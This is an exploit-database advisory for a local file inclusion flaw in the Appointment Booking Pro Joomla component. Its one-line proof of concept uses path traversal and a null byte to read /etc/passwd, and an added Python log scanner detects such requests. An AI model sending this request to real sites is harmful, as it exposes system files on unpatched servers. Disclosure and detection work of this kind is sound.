Appointment Booking Pro Joomla Component LFI Vulnerability



EDB-ID: 17553 CVE: N/A OSVDB-ID: N/A
Author: Don Tukulesto Published: 2011-07-20 Verified: Verified
Appointment Booking Pro is a native Joomla component
=================================
Last login: Tue Jun  7 2010 10:20:22 on ttys000
                                 ______                                 ___
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/| 
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/ 

Author		: Don Tukulesto (root@indonesiancoder.com)
Homepage	: http://indonesiancoder.com
Published	: July 17, 2011
Tested On	: OS X 10.5.8
=================================


=================================
|	Software Info		|
=================================
[>] Vendor      : http://www.appointmentbookingpro.com/
[>] Software    : Appointment Booking Pro - ABPro
	      Appointment Booking Pro is an appointment booking and scheduling component for web sites.
[>] Cost        : $59

I. Proof of Concept
=================================
index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000

III. Vendor patch
=================================
The vendor currently provides no patch or upgrade.
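
With no vendor fix listed, requests shaped like the proof of concept can at least be flagged in web server logs. The following is an added example, not part of the original advisory or the vendor's code: it checks the `view` parameter of `com_rsappt_pro2` requests for null bytes and path traversal after percent-decoding. The function names, the identifier-only rule for legitimate view names, and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

COMPONENT = "com_rsappt_pro2"             # option value taken from the advisory's PoC
SAFE_VIEW = re.compile(r"[A-Za-z0-9_]+")  # assumption: real view names are plain identifiers
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format); "calendar" is a made-up view name.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Jul/2011:10:01:02 +0000] "GET /index.php?option=com_rsappt_pro2&view=calendar HTTP/1.1" 200 5120',
    '198.51.100.9 - - [20/Jul/2011:10:01:05 +0000] "GET /index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000 HTTP/1.1" 200 1843',
    '198.51.100.9 - - [20/Jul/2011:10:01:09 +0000] "GET /index.php?option=com_rsappt_pro2&view=..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 200 1843',
    '198.51.100.3 - - [20/Jul/2011:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so re-encoded input is compared in the clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_view(uri):
    """Return the reasons a request URI looks like the advisory's PoC (empty list if clean)."""
    params = parse_qs(urlsplit(uri).query)
    if COMPONENT not in params.get("option", []):
        return []
    reasons = []
    for raw in params.get("view", []):
        view = fully_decode(raw)
        if "\x00" in view:
            reasons.append("null byte")
        if ".." in view or "/" in view or "\\" in view:
            reasons.append("path traversal")
        elif not SAFE_VIEW.fullmatch(view):
            reasons.append("unexpected characters")
    return reasons

def scan_log(lines):
    """Return (line_number, uri, reasons) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match and (reasons := check_view(match.group(1))):
            hits.append((number, match.group(1), reasons))
    return hits
```

Calling `scan_log(SAMPLE_LOG)` flags the second and third sample lines; the same `check_view` rule can be reused as an allow-list test in a request filter placed in front of the component.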


=================================

[>] INDONESIAN CODER ~ Server is Down ~ Malang Cyber Crew ~ Magelang Cyber ~ AntiSecurity ~ Exploit-ID
[>] M364TR0N ~ Gonzhack ~ ibl13Z ~ kaMtiEz ~ k4L0ng666 ~ vYc0D ~ Xr0b0t ~ N4ck0 ~ r3m1ck ~ Kidd ~ Jundab
[>] yur4kh4 ~ aN93l1c ~ Arianom ~ Pathloader ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ jos_ali_joe ~ mengau
[>] kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli ~ Xadal ~ Cyb3r_Tr0n

We are the watchmen, the hackers who quietly observe the scene.
bit.ly/OpIDC

=================================